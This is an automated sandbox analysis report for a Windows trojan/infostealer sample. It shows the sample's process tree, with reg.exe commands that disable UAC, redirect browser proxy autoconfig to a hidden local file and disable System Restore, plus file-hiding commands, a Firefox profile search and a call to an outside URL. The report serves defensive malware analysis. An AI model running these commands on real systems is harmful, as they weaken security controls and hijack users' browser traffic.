Overview

overview

10

Static

static

3

b9c4800063...18.exe

windows7-x64

10

b9c4800063...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    23/08/2024, 01:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b9c48000637672f2d7d7d63145067ac8_JaffaCakes118.exe

  • Size

    142KB

  • MD5

    b9c48000637672f2d7d7d63145067ac8

  • SHA1

    a972ea0ee112bc660d24bca053f342bb5729fd5a

  • SHA256

    fbb9385f752eb22943dd8d85e7cf516da201599ac5200f0a48f895fa5b884701

  • SHA512

    08d06a3a75d7a2dca37ad57dd72571e6c0e91bfbc0baac7b56118f39f2da70999d359665514e7b3cc10088965ea6b54e67b9199b62bb2f83cd4ba24a65ceb93d

  • SSDEEP

    3072:aCqJ3dPrq8iYloAAsJlvxeR0TzltP4aQ2yyY:aCu3dPrriYlDAsJlvyQnPJIyY

Score
10/10
discoveryevasionspywarestealertrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\b9c48000637672f2d7d7d63145067ac8_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b9c48000637672f2d7d7d63145067ac8_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Users\Admin\AppData\Local\Temp\windowsfix.exe
      "C:\Users\Admin\AppData\Local\Temp\windowsfix.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24000NUR.bat" "C:\Users\Admin\AppData\Local\Temp\windowsfix.exe" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" "http://afiliados.fastentrega.com/ver.php"
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2492
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2492 CREDAT:275457 /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2404
        • C:\Windows\SysWOW64\attrib.exe
          attrib +H "C:\Users\Admin\AppData\Roaming"\config26313.dat
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1816
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo y"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2176
        • C:\Windows\SysWOW64\cacls.exe
          cacls "C:\Users\Admin\AppData\Roaming"\config26313.dat /P Todos:R
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2688
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:/Users/Admin/AppData/Roaming/config26313.dat" /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2392
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1468
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2368
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2156
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2296
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2168
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2304
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:/Users/Admin/AppData/Roaming/config26313.dat" /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1692
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1336
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2980
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:896
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1000
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1664
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:860
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          PID:1788
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2364
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3036
          • C:\Windows\SysWOW64\find.exe
            find "prefs.js"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3028
        • C:\Windows\SysWOW64\attrib.exe
          attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js "
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2020
        • C:\Windows\SysWOW64\attrib.exe
          attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js "
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1196
        • C:\Windows\SysWOW64\attrib.exe
          attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js "
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1632

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    6939b4d170ffb9f0590766d82fb4e2e9

    SHA1

    dfc83ec6b3a3f72969cf4d5d840c21a5b0ac0388

    SHA256

    9bebff20ef246c5ddec6ef5012287129510c869d3e442f1859e5267dd7b88a75

    SHA512

    c1a1ec34e8b2a12267fb5f45e2a7d09615fa97120bb86742ff34b6876c8b599cae8f3f1da49738f921c213223ddefe411232d4932c946c8b5f2fd5f0d2c72728

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    9a542390d9f85222f9ad416cb5acc610

    SHA1

    693f46a9acf6960138ad152a30935cc05eea9fa6

    SHA256

    a2bbd4c1baa72fdc72fddd50c672b38baa0a13d7f01f02c1a7c767725598677b

    SHA512

    d5249e2ec8f88e38af41bc6e132fae170ff507057f08b13e04b2eb3d7d2fbb95a7e9baf0ab0913044892f263fcc38f055bfd4911541421e6a34daeda5ae588a8

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    86d982e6c8d988b613da1486fd7f6961

    SHA1

    f152af596257405f8a34a9118a68680e200a553e

    SHA256

    89f5a699c3238107e14f34fddc9e41cadb4c19ad82e4f195198396d13d32f33b

    SHA512

    1b6ae993583a9593bb9a8d134810bb152011fa5a2b8783105283932bdc149351fe2199c85739eb4623d97075b6b4dc0582fb4c1e338eef062edbe6b22811307c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    926ab6a47ef9def156063188cc9754b4

    SHA1

    9b86cc18ae0004a1c1987e022db5b4936c59bc32

    SHA256

    09b7ca08089c47bc7c293d786469726fd7c43227b6d99a02436eb361f8cd9544

    SHA512

    5076dcbf76c369731e8bdcb164cfb861e1215bdfe6f8d5a659e9c36acbc32aa023f0e1543deb64c430f741c04f4aa9fd7e0fc68df5fbdb74ae0fca05baebcc36

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    69a9b047922ae61c6cb3e04f34a0ba3f

    SHA1

    af60664f9ebbf00374440b95d8527911ac1133e3

    SHA256

    76f0b6f1e452644df059ce62112dc7e0b635a8f57884c099f4e7eaa7e5b37ec8

    SHA512

    27cf615aadfcac8227aa64b47de9248cc242538b1bc21c2a507801267350b69cf60aa612590768e51893744a25ae68e7065226b035e5a25d8a1c84026caaf906

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    9651183c250154244c4bfc1e6e35cbbc

    SHA1

    b328f7cc8d4f1603e7a6eb3802c0ded4ab662c55

    SHA256

    05044de0233d7f67e2e9fff51cdc707a9250ced9a6ebb3850244bf548b080ee3

    SHA512

    8d481edfdf859f022da520d1d8e83ab754b3caf4bbf1c768431cd6a91dc795ed39190b6e603e2c04139613de9b7be7c883ba7e8b3c320bdbc144d79e4c095a98

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    6e5e37d27499dbaca1107fa47b62cfe3

    SHA1

    fb9649bdeb299e4ecd6cd7ed5b345e1d17f6c91a

    SHA256

    ed5b4563db4fabe83fabc9b51e675ae3108266c57baf51d828667a5c4e03a8bb

    SHA512

    f3a50c1bda895f114e6a271879e674c3719b7e15b341da518919a79403ceca199d858eadbca70701f6cc9f1189de8767b704866194b82d9805d1e6666ea41c4c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    b1cf03786a40dab8b2ac75349489b499

    SHA1

    e6da469c5143cc424fe4d71c9209602dca29df92

    SHA256

    ce4081cd0c2fa5229fd7eaef289592b575161e374efad9670e7255f7b0bc2b19

    SHA512

    d4b5728b9cb35d78cc6e829a509b9c01e0a4459c13c33da6d9c62b887d4fc1ace2fd8171bccbb0eda903d5aa2e591d48186b5fdcb50215a3005371c6103dc68f

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    03e68fdd2350dfef363304a195337335

    SHA1

    52c8a296e856fc7d987162b903d0fd7c2dadc5cb

    SHA256

    3b36b9bbec3ca599e772ddc3dc5b471a51398e76a0d0103f966190e1616dec06

    SHA512

    ae7f5d37cd47e70c1775047cddbda651ac339f072f236fa0b2f7c8999df7734b05757d65cdfc962e2a981496ac1462b2aa07945e6f4ee6e717b6a19c78ca86ed

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    1ac9d000bc6662c7d9e843419e71d1d9

    SHA1

    e0fd135a00230a8e7151b176ee2e29ea120c5563

    SHA256

    f1a1a4ed1a6fbd1cbb25ab4406b906a261a2310b483877c7c8e31aa71abffe6e

    SHA512

    45c9c6353f4f34b8691bd16180f72ad782af67e9c75a71df80f11e7c8988b86a1446445d3ac3a804ae42cf288ab54b1f726f45b481897115f29a24122bc3886b

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    c3ce3cc549c86f593081128ffcc7eb2e

    SHA1

    87ad314fa97650fb75e8682a4fe72b55cb05a558

    SHA256

    33ad06b31c91ffaac3a3852f849bce8fcf339b1c90bcd8d94b38f07adc1900e3

    SHA512

    435555cb9e03edef4512b6ccf6a13c0bfe133a4c20290ce6cbe86b61845ce5fdf4e68e865386a5f3ecac90e2caf026f3bc5cfc0c5215f723cf1f6e5fd109b546

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    af6eda4095de1bd8a8af562b13d3ebe6

    SHA1

    e5bba262422106216842d0035b1087b9248c1b30

    SHA256

    4b2305d5a5bc6f70c8aaf28e62bac83500163adf3e5f047a29d38ec603c47ba7

    SHA512

    4ec9d702b9b92478d85bae09ca6f777571a5853170c881e0026a9f10777cca41bc634b4462e9077a559d4fff891c7080c484e670e64ca494fe5de3454c323c07

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    7c7d971425446402a3a6e26467bec2c0

    SHA1

    86920aafa86645cac025593930f3d140dce10649

    SHA256

    b36b69eccc68178fb0fc1007818e6c9ac57eca586195abd2d8a7b5c83a9653e0

    SHA512

    dee9c79c047baf583740789eaf6c11b0474b6ffeca2befb73398ee3378eafec2c876956ec469e51cdb5d3cf24168254225fe98f6fd8f992035e0315da1c3c189

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    ba999fe8d2c00a98d7966dcb8c74d383

    SHA1

    0d31607e9c5537ac63f3cb7ab48e388f1b25f66c

    SHA256

    c2c20da57e0beefbcda3aabc2feb3a553a769462c5f5be373af0d7dd9c984dc3

    SHA512

    e6c2f47646210dacc0d9b0bf2e890b6c421644f536d3a1a49489403446dd3a9a08b674778c36b98a5604fa43ede02cbecc7ffc933e0cfb2d89c939f34c9db4cb

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    e7c097ecb126ea4007e95f74ec7562f5

    SHA1

    b4028babf11fd60913836c023043a46c8c21fc18

    SHA256

    614c35f5d742423dd762a2e4125bfebade77383297fc3d089a49d31edd336808

    SHA512

    57e777f8b10bb24b58234761f8b7cf81165ba45942e43cb9b194ea63a1a35bad0331fe99dcb57bb04da929371752b183cd79117c08720064899f1846114c7e4b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\24000NUR.bat
    Filesize

    36KB

    MD5

    d2c9a867de7b726dfb6a10876c8cee87

    SHA1

    e730dbbea264eb0fd006024a4c5cbb9110fd87f1

    SHA256

    9b2503bf63c59f8a3ac9a6a1d61ebdeb6638c317aa45b64551e9c175a4cbaa83

    SHA512

    32ff8ae5481dfe9f48fe5e43ee0e8c1d1ec463f797c719cc3d2b4eac686e6e8694bd31556a972af86b0a4acba9393a8af31e7b223f2282d33b90b2662baf113f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabD684.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarD733.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js
    Filesize

    6KB

    MD5

    852fa79848de752ea73d2081221a1018

    SHA1

    63d3ae23295d88b496faeab6c3c87e03f7d865f8

    SHA256

    145d6d8d456900e593991a0626e34a1bfa3ee89cc53459141f62aa147b5fe98d

    SHA512

    ee248d6a6ed4bad16f73091e9bace8c1475e4f5da85c00fcabe9163e144ed82e964583f8ab9002043fd168cb6759b522efdd31269c9c2ab42a66f683b1b12321

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js
    Filesize

    6KB

    MD5

    287577a8547c8d6feef25f2e26a81afd

    SHA1

    3d57270b458981cceb7184ee4e79fdff442433d4

    SHA256

    10c89be610a9c64a174ba7d57122568772822c2fbb749907f9b0508719d00784

    SHA512

    d0416db1761d52e37f0a786768f19fa67accab57be374c19d54a6e58cb9d3337765e94457063003fa0421c7a3a39fbd4365e034f76490db654bbc19df4fda3ad

    Download Submit

  • C:\Users\Admin\AppData\Roaming\config26313.dat
    Filesize

    158B

    MD5

    f264b57c81690df5ce1b4ace499435d6

    SHA1

    a2327a81d1b8908967e4896f5637454cdcce2747

    SHA256

    01946a98faa7a268b6fa0613d57fe25f611e1e85e2c71ea4d5d55a28259cd415

    SHA512

    3ab2a7a74f85cd8916f69dc18f8e7511dcbb5b034920bbcf2634e43b5922d0253cbdfd525c122360054161fab3c09089a8278a7e9b6fa24d062d0e38adc0a698

    Download Submit

  • C:\Users\Admin\AppData\Roaming\config26313.dat
    Filesize

    3KB

    MD5

    01f34a9cfd21a64e000174d42c2bb30b

    SHA1

    e98ebaf3e9b6745bd2ab6fd6d3a8eaf755ed7a24

    SHA256

    1876630a69eceb84e285ac4e2c83f83d65135bc6b0139ab90028e0b3cc05238b

    SHA512

    cf81c5e91a12f4b8105322ad0fb36355b5f834aea31e60d9eee5dfc7f1e282e75e222957b29264e3dfcf9ddccb1ac672720c55c99cc8fa83497ddf79d5f9516b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\config26313.dat
    Filesize

    32B

    MD5

    2051547be5bb9b74e8d202836ccc8f41

    SHA1

    f30c16b3977adcb0f434fdbb4e4b81fc1919f447

    SHA256

    01bf59209d2b7d7c5699f654f63165d75e472367cbe4ab4e2dd85fd9a50a21ec

    SHA512

    29d46e997348fc0da1744feca62a3a97731288dc142a0d976240f95c457e7a40a2c8e9da94c1ea522e526752093b400d1f8c7594577cd8679db82ec2dec2ecaf

    Download Submit

  • C:\Users\Admin\AppData\Roaming\config26313.dat
    Filesize

    70B

    MD5

    a1401ac64049834e229b00353cd4ee77

    SHA1

    5a1847ba20a6c7c6a9e1e70658e018811de0c570

    SHA256

    fb6d78e9e67041a572b1959cd59d0356bf258186589d9fd3318a6cf6204b4dd3

    SHA512

    76cfde7dca908630f534e1d1384a8a607b9f5fd05b79d61f9ed489d74c37150849a9cadff0d9c04ca8d495615cb6ed4cd95aac2d447ac3ce86340f8774502653

    Download Submit

  • C:\Users\Admin\AppData\Roaming\config26313.dat
    Filesize

    114B

    MD5

    c0238d8f37b32da3b86a0e2ad2a291c6

    SHA1

    d82e8cc39bb4ba80c94bb6ad678cb18095276947

    SHA256

    3da9f16b73418e492111170131b90d239cd9e03ff49de0d8d84990c17b41ad59

    SHA512

    3b77c95bf81b38d05ea33519f940fe6925725dbc9453b81a6fe51f5b92ac3312181dc8b7025cf15566b4a0eeff678d977cd56da8b20e3ef67f72e7795ce9bf3e

    Download Submit

  • \Users\Admin\AppData\Local\Temp\windowsfix.exe
    Filesize

    85KB

    MD5

    4f9ab011a670ee462b956cc7090780dc

    SHA1

    0039aa764eb3dc8418c70c38df928418b649569e

    SHA256

    8bb0fc77674fb210553abe18b7d31bd9cd4bc27f827fff66c197d6ac7c4abb28

    SHA512

    b096b12b8e46a7d1e54374025ab4817ad834c8ba6ca383f34b9dc51d07b4bb2871dc16e56864c24aa45371f8b230d367a71dabcb8cc6f86e5d0a685c555d2849

    Download Submit

  • memory/2400-180-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

    Download